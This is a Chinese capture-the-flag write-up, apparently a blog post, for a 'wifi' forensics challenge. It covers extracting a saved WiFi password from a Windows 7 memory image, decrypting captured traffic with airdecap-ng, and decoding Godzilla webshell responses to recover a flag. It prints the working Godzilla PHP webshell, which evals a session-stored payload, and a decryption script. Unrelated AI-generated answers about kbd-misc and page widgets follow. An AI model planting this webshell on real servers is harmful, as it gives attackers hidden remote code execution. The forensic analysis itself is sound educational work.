陇剑杯-Misc-wifi

题目:
在这里插入图片描述

首先下载可以得到三个文件,
一个镜像,两个流量包(客户端和服务器端)

先看下客户端的流量:
在这里插入图片描述流量被加密了,后面肯定需要通过某种方式解密
可以从中提取一些信息:

SSID(路由器发送的无线信号的名字)=My_Wifi和HuaweiDe_4c:55:ec

aircrack-ng主要用于wifi流量包密码的恢复,需要提供一份字典

airdecap-ng 用于解开正在加密的流量包 ,需要知道ssid和pass,这里猜测应该是用这个。

继续看服务端的包:
知道是上传了木马,那么肯定是通过post方式,查找post的包
在这里插入图片描述在这里发现一段加密数据的信息,按照其提示进行重放:
在这里插入图片描述

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

拿去搜索一下发现这是个哥斯拉shell工具的加密流量在这里插入图片描述对哥斯拉加密流量的描述

里面可以知道的有:

服务器响应数据左右附加的混淆字符串(对于PHP_XOR_BASE64加密方式来说,前后各附加了16位的混淆字符),然后将得到的数据进行base64解码,最后再和shell连接密钥md5值的前16位按位异或,即完成响应数据的解密。

获取到服务器响应报文后,最多进行一次gzip解压。

即要想解密服务器响应数据,需要去除混淆字符,进行base64解密,再异或,再进行gzip解密。

欧克现在去看看看镜像里面有什么内容(目的是破解客户端的流量)

前面知道破解流量包需要ssid和密码,知道ssid=My_Wifi,那就去找一下

vol.py -f Windows\ 7-dde00fa9.vmem imageinfo 

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "My_Wifi"

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003fdc38c8 --dump-dir=./

vol.py -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces"

在这里插入图片描述找到一个压缩文件,需要密码,将压缩文件拿到win环境中查看
在这里插入图片描述密码在网络适配器(网卡)中

win7系统,关于系统保存的wifi密码文件地址:如果是Windows Vista或Windows 7,保存在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]

搜索Interfaces查看:
在这里插入图片描述知道GUID:{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}

  • 打开加密文件:
    在这里插入图片描述欧克似乎已经找到了密码:233@114514_qwe

使用airdecap-ng破解:
在这里插入图片描述
得到解密后的客户端流量包:在这里插入图片描述那么flag在哪呢?
已知小王往 upload-labs 上传木马后进行了 cat /flag,小王在根目录下读取了flag,那么这个flag应该在发出请求后哥斯拉响应的数据中。

在上面查看资料后可以知道相关的解密方法,利用前面获取的脚本模仿写下解密脚本:

<?php
function encode($D,$K){
	for($i=0;$i<strlen($D);$i++){
		$c = $K[$i+1&15];
		$D[$i] = $D[$i]^$c;
	}
	return $D;
}
 
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
echo gzdecode(encode(base64_decode('需要解密的内容'),$key));
?>
  • 现在是需要在客户端获取服务器响应的数据:
    同样是http协议,过滤下,多跟踪几个数据,进行解密。
    尝试解密了几个都发现不是flag,使用这个http流,最终成功复现出flag
    在这里插入图片描述最后得到flag(其中gzdecode函数是在php 5.4之后才有用):

flag{5db5b7b0bb74babb66e1522f3a6b1b12}

在这里插入图片描述
收获:

  • airdecap-ng的使用方法
  • 哥斯拉shell管理工具加密传输流量的初步了解
  • 思维导图在这里插入图片描述
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
### 回答1: kbd-misc-2.5.1是一个Linux操作系统下的键盘输入处理工具包,它包含了一些常用的工具和驱动程序,如loadkeys、dumpkeys、kbd_mode等。这些工具可以帮助用户配置和管理Linux系统下的键盘输入设备,包括设置键盘映射、键盘布局、键盘模式等。同时,kbd-misc-2.5.1还提供了一些驱动程序,如atkbd、ps2mouse等,用于支持各种类型的键盘和鼠标设备。kbd-misc-2.5.1是一个开源项目,它的源代码可以在GitHub上免费获取和更新,支持多种Linux发行版和硬件平台。 ### 回答2: kbd-misc-2.5.1 是一个开源软件包,其中包含了一些与键盘和输入设备有关的工具和驱动程序。这个软件包是在Linux内核中使用的,并提供了一些用于处理和管理键盘和输入设备的功能。 kbd-misc-2.5.1 软件包中的一些主要功能包括: 1. 键盘驱动程序:这个软件包提供了一些用于驱动各种类型的键盘的驱动程序。这些驱动程序允许操作系统与键盘进行通信,接收来自键盘的输入,并将其发送给应用程序。 2. 控制台工具:kbd-misc-2.5.1 还包含了一些用于控制台显示的工具。这些工具可以配置控制台的字体、颜色和布局等属性,提供了一些命令行工具来管理控制台的显示内容。 3. 输入法支持:该软件包还提供了对输入法的支持。它包含了一些输入法引擎和库文件,可以将输入法的功能集成到系统中,并提供输入法切换和输入法配置等功能。 4. 键盘映射:kbd-misc-2.5.1 还提供了一些工具和配置文件,用于定义键盘的映射规则。这允许用户自定义键盘的按键功能,以满足个人偏好或特定需求。 总之,kbd-misc-2.5.1 是一个用于处理和管理键盘和输入设备的开源软件包。它提供了一些驱动程序、工具和配置文件,允许用户自定义键盘和控制台的设置,并提供输入法支持和键盘映射功能。 ### 回答3: kbd-misc-2.5.1 是一个用于 Linux 操作系统的桌面键盘和控制台控制工具集。 kbd-misc-2.5.1 提供了一系列实用程序和工具,用于访问和管理 Linux 系统中的键盘和控制台。其中包括一些用于控制键盘布局和映射的工具,以及一些用于处理键盘输入的实用程序。这些工具可以帮助用户在 Linux 系统中调整和定制键盘的功能和行为。 kbd-misc-2.5.1 还包含一些用于控制台中显示的字符和图形的程序。这些程序可以提供更丰富的字符和图形显示效果,使控制台界面更加美观和易于使用。 该工具集还提供了一些用于处理输入事件和生成键盘事件的库和驱动程序。这些库和驱动程序可以与操作系统内核进行交互,以实现键盘输入的捕获和处理。 总的来说,kbd-misc-2.5.1 是一个功能丰富的工具集,用于在 Linux 系统中控制和定制键盘和控制台的功能和行为。它提供了一些实用程序、工具、库和驱动程序,帮助用户充分利用键盘和控制台的功能,提高系统的易用性和个性化定制能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YnG_t0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值